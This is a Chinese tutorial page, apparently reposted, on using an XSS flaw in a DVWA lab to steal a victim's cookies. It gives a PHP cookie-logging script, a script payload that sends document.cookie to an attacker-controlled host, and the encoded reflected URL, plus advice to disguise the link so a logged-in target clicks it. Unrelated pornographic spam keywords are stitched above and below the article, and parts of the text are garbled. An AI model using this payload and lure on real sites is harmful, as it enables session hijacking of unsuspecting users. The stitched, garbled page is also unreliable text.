国产成人精品18p,天天干成人网,无码专区狠狠躁天天躁,美女脱精光隐私扒开免费观看

如何利用XSS漏洞獲取對方cookie

發(fā)布時(shí)間:2021-09-14 11:25 來(lái)源:億速云 閱讀:0 作者:chen 欄目: 網(wǎng)絡(luò )安全

這篇文章主要講解了“如何利用XSS漏洞獲取對方cookie”,文中的講解內容簡(jiǎn)單清晰,易于學(xué)習與理解,下面請大家跟著(zhù)小編的思路慢慢深入,一起來(lái)研究和學(xué)習“如何利用XSS漏洞獲取對方cookie”吧!

(1)環(huán)境搭建

kali linux:192.168.80.136

目標win7: 192.168.80.130

Metasploitable:192.168.80.129

cookie接收腳本get.php(腳本在/var/www/html文件夾下,html文件夾權限777):

<?php
$ck =$_GET['cookie'];
error_log("$ck\n",3,"cookie.txt");
?>

       (2)XSS漏洞利用

       目標登錄metasploitable的DVWA,點(diǎn)擊存在XSS漏洞的頁(yè)面,輸入如下代碼后提交:<script>newImage().src="http://192.168.80.136/get.php?cookie="+document.cookie;</script>

(3)查看cookie

       切換到kali,直接查看cookie.txt內容,可以看到獲得的cookie。

(4)進(jìn)一步利用

       目標提交后可以在地址欄看到如下URL:

http://192.168.80.129/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Enew+Image%28%29.src%3D%22http%3A%2F%2F192.168.80.136%2Fget.php%3Fcookie%3D%22%2Bdocument.cookie%3B%3C%2Fscript%3E#

       可以將以上URL偽裝成其他形式(如圖片),誘使目標點(diǎn)擊,在目標已登錄的情況下,可以達到同樣獲取cookie的效果。

免責聲明:本站發(fā)布的內容(圖片、視頻和文字)以原創(chuàng )、來(lái)自互聯(lián)網(wǎng)轉載和分享為主,文章觀(guān)點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權請聯(lián)系QQ:712375056 進(jìn)行舉報,并提供相關(guān)證據,一經(jīng)查實(shí),將立刻刪除涉嫌侵權內容。

亚洲AV涩涩涩成人网站在线播放| 国产精品成人无码视频| 国产精品99久久免费观看| 爱性久久久久久久久| АV天堂手机版在线观看| 高干病房玩弄少妇护士|